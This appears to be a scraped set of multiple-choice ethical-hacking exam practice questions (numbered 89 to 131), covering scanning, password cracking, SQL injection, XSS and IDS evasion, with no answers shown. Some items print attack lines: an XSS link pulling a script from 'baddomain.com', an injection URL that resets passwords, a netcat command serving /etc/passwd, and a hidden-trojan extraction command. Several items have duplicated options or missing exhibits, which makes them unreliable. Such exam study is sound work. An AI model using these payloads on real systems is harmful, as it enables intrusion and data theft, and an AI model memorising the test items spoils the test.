The problem is that with the widespread use of firewalls on the Internet today, many of the packets that traceroute sends out end up being filtered, making it impossible to completely trace the path to the destination.

How would you overcome the Firewall restriction on ICMP ECHO packets?

A.

Firewalls will permit inbound TCP packets to specific ports that hosts sitting behind the firewall are listening for connections. By sending out TCP SYN packets instead of ICMP ECHO packets, traceroute can bypass the most common firewall filters.

B.

Firewalls will permit inbound UDP packets to specific ports that hosts sitting behind the firewall are listening for connections. By sending out TCP SYN packets instead of ICMP ECHO packets, traceroute can bypass the most common firewall filters.

C.

Firewalls will permit inbound UDP packets to specific ports that hosts sitting behind the firewall are listening for connections. By sending out TCP SYN packets instead of ICMP ECHO packets, traceroute can bypass the most common firewall filters.

D.

Do not use traceroute command to determine the path packets take to reach the destination instead use the custom hacking tool JOHNTHETRACER and run with the command

E.

\> JOHNTHETRACER www.eccouncil.org -F -evade

Question # 89

John runs a Web server, IDS and firewall on his network. Recently his Web server has been under constant hacking attacks. He looks up the IDS log files and sees no intrusion attempts, but the Web server constantly locks up and needs rebooting due to various brute force and buffer overflow attacks, and still the IDS alerts no intrusion whatsoever. John becomes suspicious, views the Firewall logs, and notices huge SSL connections constantly hitting his Web server. Hackers have been using the encrypted HTTPS protocol to send exploits to the Web server, and that was the reason the IDS did not detect the intrusions. How would John protect his network from these types of attacks?

A.

Install a proxy server and terminate SSL at the proxy

B.

Enable the IDS to filter encrypted HTTPS traffic

C.

Install a hardware SSL "accelerator" and terminate SSL at this layer

D.

Enable the Firewall to filter encrypted HTTPS traffic

Question # 90

Which type of antenna is used in wireless communication?

A.

Omnidirectional

B.

Parabolic

C.

Uni-directional

D.

Bi-directional

Question # 91

Least privilege is a security concept that requires that a user is

A.

limited to those functions required to do the job.

B.

given root or administrative privileges.

C.

trusted to keep all data and access to that data under their sole control.

D.

given privileges equal to everyone else in the department.

Question # 92

Some passwords are stored using specialized encryption algorithms known as hashes. Why is this an appropriate method?

A.

It is impossible to crack hashed user passwords unless the key used to encrypt them is obtained.

B.

If a user forgets the password, it can be easily retrieved using the hash key stored by administrators.

C.

Hashing is faster compared to more traditional encryption algorithms.

D.

Passwords stored using hashes are non-reversible, making finding the password much more difficult.

Question # 93

A security engineer is attempting to map a company’s internal network. The engineer enters the following NMAP command:

NMAP -n -sS -P0 -p 80 ***.***.**.**

What type of scan is this?

A.

Quick scan

B.

Intense scan

C.

Stealth scan

D.

Comprehensive scan

Question # 94

In order to show improvement of security over time, what must be developed?

A.

Reports

B.

Testing tools

C.

Metrics

D.

Taxonomy of vulnerabilities

Question # 95

You are the security administrator for a large network. You want to prevent attackers from running any sort of traceroute into your DMZ and discovering the internal structure of publicly accessible areas of the network. How can you achieve this?

A.

There is no way to completely block tracerouting into this area

B.

Block UDP at the firewall

C.

Block TCP at the firewall

D.

Block ICMP at the firewall

Question # 96

Which of the following describes a component of Public Key Infrastructure (PKI) where a copy of a private key is stored to provide third-party access and to facilitate recovery operations?

A.

Key registry

B.

Recovery agent

C.

Directory

D.

Key escrow

Question # 97

WWW wanderers or spiders are programs that traverse many pages in the World Wide Web by recursively retrieving linked pages. Search engines like Google frequently spider web pages for indexing. How will you stop web spiders from crawling certain directories on your website?

A.

Place a robots.txt file in the root of your website listing the directories that you don't want to be crawled

B.

Place authentication on root directories that will prevent crawling from these spiders

C.

Enable SSL on the restricted directories which will block these spiders from crawling

D.

Place "HTTP:NO CRAWL" on the html pages that you don't want the crawlers to index

Question # 98

Passive reconnaissance involves collecting information through which of the following?

A.

Social engineering

B.

Network traffic sniffing

C.

Man in the middle attacks

D.

Publicly accessible sources

Question # 99

You are performing a port scan with nmap. You are in a hurry and conducting the scans at the fastest possible speed. However, you don't want to sacrifice reliability for speed. If stealth is not an issue, what type of scan should you run to get very reliable results?

A.

Stealth scan

B.

Connect scan

C.

Fragmented packet scan

D.

XMAS scan

Question # 100

Wayne is the senior security analyst for his company. Wayne is examining some traffic logs on a server and came across some inconsistencies. Wayne finds some IP packets from a computer purporting to be on the internal network. The packets originate from 192.168.12.35 with a TTL of 15. The server replied to this computer and received a response from 192.168.12.35 with a TTL of 21. What can Wayne infer from this traffic log?

A.

The initial traffic from 192.168.12.35 was being spoofed.

B.

The traffic from 192.168.12.25 is from a Linux computer.

C.

The TTL of 21 means that the client computer is on wireless.

D.

The client computer at 192.168.12.35 is a zombie computer.

Question # 101

A company is using Windows Server 2003 for its Active Directory (AD). What is the most efficient way to crack the passwords for the AD users?

A.

Perform a dictionary attack.

B.

Perform a brute force attack.

C.

Perform an attack with a rainbow table.

D.

Perform a hybrid attack.

Question # 102

SSL has been seen as the solution to a lot of common security problems. Administrators will often make use of SSL to encrypt communications from point A to point B. Why do you think this could be a bad idea if there is an Intrusion Detection System deployed to monitor the traffic between point A and B?

A.

SSL is redundant if you already have IDS's in place

B.

SSL will trigger rules at regular intervals and force the administrator to turn them off

C.

SSL will slow down the IDS while it is breaking the encryption to see the packet content

D.

SSL will blind the content of the packet and Intrusion Detection Systems will not be able to detect them

Question # 103

Blane is a network security analyst for his company. From an outside IP, Blane performs an XMAS scan using Nmap. Almost every port scanned does not elicit a response. What can he infer from this kind of response?

A.

These ports are open because they do not elicit a response.

B.

He can tell that these ports are in stealth mode.

C.

If a port does not respond to an XMAS scan using NMAP, that port is closed.

D.

The scan was not performed correctly using NMAP since all ports, no matter what their state, will elicit some sort of response from an XMAS scan.

Question # 104

Harold works for Jacobson Unlimited in the IT department as the security manager. Harold has created a security policy requiring all employees to use complex 14 character passwords. Unfortunately, the members of management do not want to have to use such long complicated passwords so they tell Harold's boss this new password policy should not apply to them. To comply with the management's wishes, the IT department creates another Windows domain and moves all the management users to that domain. This new domain has a password policy only requiring 8 characters.

Harold is concerned about having to accommodate the managers, but cannot do anything about it. Harold is also concerned about using LanManager security on his network instead of NTLM or NTLMv2, but the many legacy applications on the network prevent using the more secure NTLM and NTLMv2. Harold pulls the SAM files from the DCs on the original domain and the new domain using Pwdump6.

Harold uses the password cracking software John the Ripper to crack users' passwords to make sure they are strong enough. Harold expects that the users' passwords in the original domain will take much longer to crack than the management's passwords in the new domain. After running the software, Harold discovers that the 14 character passwords only took a short time longer to crack than the 8 character passwords.

Why did the 14 character passwords not take much longer to crack than the 8 character passwords?

A.

Harold should have used Dumpsec instead of Pwdump6

B.

Harold's dictionary file was not large enough

C.

Harold should use LC4 instead of John the Ripper

D.

LanManager hashes are broken up into two 7 character fields

Question # 105

The network administrator at Spears Technology, Inc has configured the default gateway Cisco router's access-list as below:

You are hired to conduct security testing on their network. You successfully brute-force the SNMP community string using a SNMP crack tool. The access-list configured at the router prevents you from establishing a successful connection. You want to retrieve the Cisco configuration from the router. How would you proceed?

A.

Use the Cisco's TFTP default password to connect and download the configuration file

B.

Run a network sniffer and capture the returned traffic with the configuration file from the router

C.

Run Generic Routing Encapsulation (GRE) tunneling protocol from your computer to the router masking your IP address

D.

Send a customized SNMP set request with a spoofed source IP address in the range - 192.168.1.0

Question # 106

A Trojan horse is a destructive program that masquerades as a benign application. The software initially appears to perform a desirable function for the user prior to installation and/or execution, but in addition to the expected function steals information or harms the system.

The challenge for an attacker is to send a convincing file attachment to the victim, which gets easily executed on the victim machine without raising any suspicion. Today's end users are quite knowledgeable about malware and viruses. Instead of sending games and fun executables, Hackers today are quite successful in spreading the Trojans using Rogue security software.

What is Rogue security software?

A.

A flash file extension to Firefox that gets automatically installed when a victim visits rogue software disabling websites

B.

A Fake AV program that claims to rid a computer of malware, but instead installs spyware or other malware onto the computer. This kind of software is known as rogue security software.

C.

Rogue security software is based on a social engineering technique in which the attackers lure victims to visit spear phishing websites

D.

This software disables firewalls and establishes reverse connecting tunnel between the victim's machine and that of the attacker

Question # 107

Bob has been hired to do a web application security test. Bob notices that the site is dynamic and must make use of a back end database. Bob wants to see if SQL Injection would be possible. What is the first character that Bob should use to attempt to break a valid SQL request?

A.

Semicolon

B.

Double Quote

C.

Single Quote

D.

Exclamation Mark

Question # 108

Data is sent over the network as clear text (unencrypted) when Basic Authentication is configured on Web Servers.

A.

true

B.

false

Question # 109

A simple compiler technique used by programmers is to add a terminator 'canary word' containing four letters NULL (0x00), CR (0x0d), LF (0x0a) and EOF (0xff) so that most string operations are terminated. If the canary word has been altered when the function returns, and the program responds by emitting an intruder alert into syslog and then halts, what does it indicate?

A.

A buffer overflow attack has been attempted

B.

A buffer overflow attack has already occurred

C.

A firewall has been breached and this is logged

D.

An intrusion detection system has been triggered

E.

The system has crashed

Question # 110

Nathan is testing some of his network devices. Nathan is using Macof to try and flood the ARP cache of these switches. If these switches' ARP cache is successfully flooded, what will be the result?

A.

The switches will drop into hub mode if the ARP cache is successfully flooded.

B.

If the ARP cache is flooded, the switches will drop into pix mode making it less susceptible to attacks.

C.

Depending on the switch manufacturer, the device will either delete every entry in its ARP cache or reroute packets to the nearest switch.

D.

The switches will route all traffic to the broadcast address, creating collisions.

Question # 111

Which of the following encryption algorithms is NOT based on a block cipher?

A.

DES

B.

Blowfish

C.

AES (Rijndael)

D.

RC4

Question # 112

Buffer X in an Accounting application module for Brownies Inc. can contain 200 characters. The programmer makes an assumption that 200 characters are more than enough. Because there were no proper boundary checks being conducted, Bob decided to insert 400 characters into the 200-character buffer. (Overflows the buffer). Below is the code snippet:

How can you protect/fix the problem of your application as shown above?

A.

Because the counter starts with 0, we would stop when the counter is less than 200

B.

Because the counter starts with 0, we would stop when the counter is more than 200

C.

Add a separate statement to signify that if we have written less than 200 characters to the buffer, the stack should stop because it cannot hold any more data

D.

Add a separate statement to signify that if we have written 200 characters to the buffer, the stack should stop because it cannot hold any more data

Question # 113

Which of the following steganography utilities exploits the nature of white space and allows the user to conceal information in these white spaces?

A.

Image Hide

B.

Snow

C.

Gif-It-Up

D.

NiceText

Question # 114

Identify SQL injection attack from the HTTP requests shown below:

A.

http://www.myserver.c0m/search.asp?lname=smith%27%3bupdate%20usertable%20set%20passwd%3d%27hAx0r%27%3b--%00

B.

http://www.myserver.c0m/script.php?mydata=%3cscript%20src=%22

C.

http%3a%2f%2fwww.yourserver.c0m%2fbadscript.js%22%3e%3c%2fscript%3e

D.

http://www.victim.com/example accountnumber=67891 &creditamount=999999999

Question # 115

Every company needs a formal written document which spells out to employees precisely what they are allowed to use the company's systems for, what is prohibited, and what will happen to them if they break the rules. Two printed copies of the policy should be given to every employee as soon as possible after they join the organization. The employee should be asked to sign one copy, which should be safely filed by the company. No one should be allowed to use the company's computer systems until they have signed the policy in acceptance of its terms. What is this document called?

A.

Information Audit Policy (IAP)

B.

Information Security Policy (ISP)

C.

Penetration Testing Policy (PTP)

D.

Company Compliance Policy (CCP)

Question # 116

This is an attack that takes advantage of a web site vulnerability in which the site displays content that includes un-sanitized user-provided data.

<a href="http://foobar.com/index.html?id=%3Cscript%20src=%22http://baddomain.com/badscript.js%22%3E%3C/script%3E">See foobar</a>

What is this attack?

A.

Cross-site-scripting attack

B.

SQL Injection

C.

URL Traversal attack

D.

Buffer Overflow attack

Question # 117

Which type of sniffing technique is generally referred to as a MiTM attack?

A.

Password Sniffing

B.

ARP Poisoning

C.

Mac Flooding

D.

DHCP Sniffing

Question # 118

What is the correct order of steps in CEH System Hacking Cycle?

A.

Option A

B.

Option B

C.

Option C

D.

Option D

Question # 119

You work for Acme Corporation as Sales Manager. The company has tight network security restrictions. You are trying to steal data from the company's Sales database (Sales.xls) and transfer them to your home computer. Your company filters and monitors traffic that leaves from the internal network to the Internet. How will you achieve this without raising suspicion?

A.

Encrypt the Sales.xls using PGP and e-mail it to your personal gmail account

B.

Package the Sales.xls using Trojan wrappers and telnet them back to your home computer

C.

You can conceal the Sales.xls database in another file like photo.jpg or other files and send it out in an innocent looking email or file transfer using Steganography techniques

D.

Change the extension of Sales.xls to sales.txt and upload it as an attachment to your hotmail account

Question # 120

Exhibit:

You have captured some packets in Ethereal. You want to view only packets sent from 10.0.0.22. What filter will you apply?

A.

ip = 10.0.0.22

B.

ip.src == 10.0.0.22

C.

ip.equals 10.0.0.22

D.

ip.address = 10.0.0.22

Question # 121

Tess King, the evil hacker, is purposely sending fragmented ICMP packets to a remote target. The total size of this ICMP packet once reconstructed is over 65,536 bytes. From the information given, what type of attack is Tess King attempting to perform?

A.

Syn flood

B.

Smurf

C.

Ping of death

D.

Fraggle

Question # 122

You have hidden a Trojan file virus.exe inside another file readme.txt using NTFS streaming.

Which command would you execute to extract the Trojan to a standalone file?

A.

c:\> type readme.txt:virus.exe > virus.exe

B.

c:\> more readme.txt | virus.exe > virus.exe

C.

c:\> cat readme.txt:virus.exe > virus.exe

D.

c:\> list redme.txt$virus.exe > virus.exe

Question # 123

LM authentication is not as strong as Windows NT authentication so you may want to disable its use, because an attacker eavesdropping on network traffic will attack the weaker protocol. A successful attack can compromise the user's password. How do you disable LM authentication in Windows XP?

A.

Stop the LM service in Windows XP

B.

Disable LSASS service in Windows XP

C.

Disable LM authentication in the registry

D.

Download and install LMSHUT.EXE tool from Microsoft website

Question # 124

You have retrieved the raw hash values from a Windows 2000 Domain Controller. Using social engineering, you come to know that they are enforcing strong passwords. You understand that all users are required to use passwords that are at least 8 characters in length. All passwords must also use 3 of the 4 following categories: lower case letters, capital letters, numbers and special characters.

With your existing knowledge of users, likely user account names and the possibility that they will choose the easiest passwords possible, what would be the fastest type of password cracking attack you can run against these hash values and still get results?

A.

Online Attack

B.

Dictionary Attack

C.

Brute Force Attack

D.

Hybrid Attack

Question # 125

This kind of password cracking method uses word lists in combination with numbers and special characters:

A.

Hybrid

B.

Linear

C.

Symmetric

D.

Brute Force

Question # 126

Which of the following statements about a zone transfer are correct? (Choose three.)

A.

A zone transfer is accomplished with the DNS

B.

A zone transfer is accomplished with the nslookup service

C.

A zone transfer passes all zone information that a DNS server maintains

D.

A zone transfer passes all zone information that a nslookup server maintains

E.

A zone transfer can be prevented by blocking all inbound TCP port 53 connections

F.

Zone transfers cannot occur on the Internet

Question # 127

ARP poisoning is achieved in _____ steps

A.

1

B.

2

C.

3

D.

4

Question # 128

Which of the following algorithms can be used to guarantee the integrity of messages being sent, in transit, or stored? (Choose the best answer)

A.

symmetric algorithms

B.

asymmetric algorithms

C.

hashing algorithms

D.

integrity algorithms

Question # 129

Which DNS resource record can indicate how long any "DNS poisoning" could last?

A.

MX

B.

SOA

C.

NS

D.

TIMEOUT

Question # 130

What does the following command in netcat do?

nc -l -u -p55555 < /etc/passwd

A.

logs the incoming connections to /etc/passwd file

B.

loads the /etc/passwd file to the UDP port 55555

C.

grabs the /etc/passwd file when connected to UDP port 55555

D.

deletes the /etc/passwd file when connected to the UDP port 55555

Question # 131

Exhibit:

The following is an entry captured by a network IDS. You are assigned the task of analyzing this entry. You notice the value 0x90, which is the most common NOOP instruction for the Intel processor. You figure that the attacker is attempting a buffer overflow attack. You also notice "/bin/sh" in the ASCII part of the output. As an analyst what would you conclude about the attack?

A.

The buffer overflow attack has been neutralized by the IDS

B.

The attacker is creating a directory on the compromised machine

C.

The attacker is attempting a buffer overflow attack and has succeeded

D.

The attacker is attempting an exploit that launches a command-line shell
